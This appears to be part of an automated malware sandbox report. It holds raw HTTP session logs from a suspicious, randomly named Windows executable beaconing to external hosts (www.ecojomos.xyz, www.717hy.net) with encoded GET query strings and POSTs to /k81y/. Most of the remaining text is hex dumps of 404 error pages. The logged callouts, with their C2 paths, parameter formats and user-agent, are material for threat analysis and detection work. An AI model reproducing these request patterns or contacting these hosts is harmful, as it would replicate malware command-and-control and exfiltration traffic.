                                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                  Nov 13, 2024 15:35:11.091521025 CET636INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                  Nov 13, 2024 15:35:11.091547012 CET1236INData Raw: 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65
                                                                                  Data Ascii: 8.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4
                                                                                  Nov 13, 2024 15:35:11.091557026 CET212INData Raw: 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37
                                                                                  Data Ascii: 02,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-lineca
                                                                                  Nov 13, 2024 15:35:11.091566086 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                                  Nov 13, 2024 15:35:11.091577053 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                                                  Nov 13, 2024 15:35:11.091586113 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                                                  Nov 13, 2024 15:35:11.091599941 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                                  Nov 13, 2024 15:35:11.096548080 CET1236INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.549998203.161.46.205803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:13.930963039 CET441OUTGET /uaef/?2J=znvVMZI6wclGwSNQgZtr5fBMguex2NmDUWcQCD5rzoJFeirSAcNEfn/4jSETcpej++6Zf7EsBdpUeNRucPEp0Vp7Iz2INonuboPmggNf5Eh/heiOubkxKPwt67wGlkSjkQ==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.ecojomos.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:14.616981030 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:35:14 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:14.617002010 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                                  Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                  Nov 13, 2024 15:35:14.617014885 CET1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                                  Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                                  Nov 13, 2024 15:35:14.617027998 CET636INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                                                  Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                                                  Nov 13, 2024 15:35:14.617038965 CET1236INData Raw: 34 36 37 33 20 39 2e 37 36 30 31 33 32 2c 34 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20
                                                                                  Data Ascii: 4673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                  Nov 13, 2024 15:35:14.617049932 CET212INData Raw: 2c 31 39 2e 32 34 39 32 31 20 2d 33 2e 33 35 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d
                                                                                  Data Ascii: ,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1p
                                                                                  Nov 13, 2024 15:35:14.618045092 CET1236INData Raw: 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a
                                                                                  Data Ascii: x;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,1
                                                                                  Nov 13, 2024 15:35:14.618057013 CET1236INData Raw: 32 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32
                                                                                  Data Ascii: 26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11
                                                                                  Nov 13, 2024 15:35:14.618102074 CET424INData Raw: 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                  Nov 13, 2024 15:35:14.618113041 CET1236INData Raw: 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35
                                                                                  Data Ascii: .95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linec
                                                                                  Nov 13, 2024 15:35:14.622242928 CET1236INData Raw: 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35
                                                                                  Data Ascii: h id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.54999968.66.226.92803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:20.253917933 CET691OUTPOST /k81y/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.717hy.net
                                                                                  Origin: http://www.717hy.net
                                                                                  Referer: http://www.717hy.net/k81y/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 76 68 62 75 36 66 41 76 65 78 69 30 2b 62 79 48 76 73 4d 2b 6d 31 39 2f 67 49 77 58 50 65 59 35 45 37 37 64 6e 47 58 51 4b 52 53 35 45 43 70 43 34 6b 55 47 79 56 53 68 72 78 51 7a 7a 47 72 4a 74 73 2f 45 30 47 31 32 6a 4f 37 45 45 64 36 30 51 33 54 4d 32 37 49 6e 54 45 4d 49 39 65 47 45 55 77 38 41 4c 70 4a 5a 54 64 53 71 44 6b 4e 44 63 45 79 33 6e 49 46 53 4d 4e 44 4b 75 53 4a 71 77 42 76 2b 6b 63 32 62 61 6d 4e 37 6b 6c 45 6a 69 41 71 59 31 43 5a 4b 65 69 33 63 4e 49 68 42 76 50 79 42 4d 54 6e 4d 6d 50 76 36 75 4b 35 32 32 46 6d 52 4c 51 6e 76 66 6c 79 78 61 33 5a 54 6e 79 70 34 2f 31 63 3d
                                                                                  Data Ascii: 2J=vhbu6fAvexi0+byHvsM+m19/gIwXPeY5E77dnGXQKRS5ECpC4kUGyVShrxQzzGrJts/E0G12jO7EEd60Q3TM27InTEMI9eGEUw8ALpJZTdSqDkNDcEy3nIFSMNDKuSJqwBv+kc2bamN7klEjiAqY1CZKei3cNIhBvPyBMTnMmPv6uK522FmRLQnvflyxa3ZTnyp4/1c=
                                                                                  Nov 13, 2024 15:35:20.874661922 CET1159INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:20 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.55000068.66.226.92803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:22.807187080 CET711OUTPOST /k81y/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.717hy.net
                                                                                  Origin: http://www.717hy.net
                                                                                  Referer: http://www.717hy.net/k81y/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 76 68 62 75 36 66 41 76 65 78 69 30 2f 37 43 48 67 76 30 2b 33 46 39 38 6c 49 77 58 61 75 59 31 45 37 33 64 6e 44 75 49 4c 6a 6d 35 64 6a 5a 43 35 6d 77 47 78 56 53 68 79 42 51 32 75 32 72 34 74 73 7a 69 30 43 31 32 6a 4f 76 45 45 64 4b 30 51 6b 37 4e 6b 62 49 6c 66 6b 4d 4b 33 2b 47 45 55 77 38 41 4c 70 4d 30 54 64 61 71 44 55 39 44 63 6c 79 32 6b 49 46 52 59 64 44 4b 71 53 4a 6d 77 42 75 72 6b 64 71 31 61 6b 6c 37 6b 6c 55 6a 69 55 2b 66 2b 43 5a 4d 42 79 32 69 4f 37 49 54 77 4f 65 4b 41 53 2b 33 79 50 66 70 76 38 49 63 73 6e 75 35 59 77 4c 58 50 32 36 47 4c 48 34 36 39 52 35 49 68 69 4a 6f 44 75 42 69 2f 6a 4d 63 64 41 50 59 61 6d 55 7a 62 58 53 43
                                                                                  Data Ascii: 2J=vhbu6fAvexi0/7CHgv0+3F98lIwXauY1E73dnDuILjm5djZC5mwGxVShyBQ2u2r4tszi0C12jOvEEdK0Qk7NkbIlfkMK3+GEUw8ALpM0TdaqDU9Dcly2kIFRYdDKqSJmwBurkdq1akl7klUjiU+f+CZMBy2iO7ITwOeKAS+3yPfpv8Icsnu5YwLXP26GLH469R5IhiJoDuBi/jMcdAPYamUzbXSC
                                                                                  Nov 13, 2024 15:35:23.457957029 CET1159INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                  pragma: no-cache
                                                                                  content-type: text/html
                                                                                  content-length: 796
                                                                                  date: Wed, 13 Nov 2024 14:35:23 GMT
                                                                                  server: LiteSpeed
                                                                                  strict-transport-security: max-age=63072000; includeSubDomains
                                                                                  x-frame-options: SAMEORIGIN
                                                                                  x-content-type-options: nosniff
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.55000168.66.226.92803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:25.348265886 CET1728OUTPOST /k81y/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.717hy.net
                                                                                  Origin: http://www.717hy.net
                                                                                  Referer: http://www.717hy.net/k81y/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 76 68 62 75 36 66 41 76 65 78 69 30 2f 37 43 48 67 76 30 2b 33 46 39 38 6c 49 77 58 61 75 59 31 45 37 33 64 6e 44 75 49 4c 6a 65 35 42 46 4e 43 35 48 77 47 2b 31 53 68 74 78 51 33 75 32 72 6c 74 73 72 2b 30 43 35 4d 6a 4d 58 45 57 4f 79 30 46 6c 37 4e 76 62 49 6c 43 30 4d 50 39 65 48 65 55 77 4d 45 4c 70 63 30 54 64 61 71 44 57 6c 44 56 55 79 32 69 49 46 53 4d 4e 44 38 75 53 4a 4b 77 42 57 37 6b 64 76 41 62 55 46 37 71 68 49 6a 75 43 43 66 39 69 5a 4f 43 79 32 71 4f 37 56 4e 77 4f 43 6f 41 53 4b 4e 79 4e 2f 70 75 37 31 62 2f 47 65 74 62 6d 62 4a 63 46 36 65 54 53 77 33 77 44 42 75 71 31 68 6e 4f 75 4a 54 6f 32 6b 6c 63 6a 4f 50 47 68 49 31 53 58 47 4f 44 6d 46 78 68 68 4d 78 70 61 4d 47 48 48 37 69 56 75 74 4d 41 2f 46 46 49 45 57 58 33 4b 63 34 66 77 48 63 6c 30 6a 77 57 65 79 47 36 44 77 4b 38 79 30 72 54 58 63 64 53 4c 5a 4f 58 48 69 6b 4f 63 59 67 4a 63 31 6d 70 44 42 42 79 48 46 61 65 32 77 47 48 67 35 2b 57 73 62 44 47 34 2b 72 57 74 59 32 76 4f 4b 4f 39 6f 53 32 6e 6c 78 45 38 34 34 [TRUNCATED]
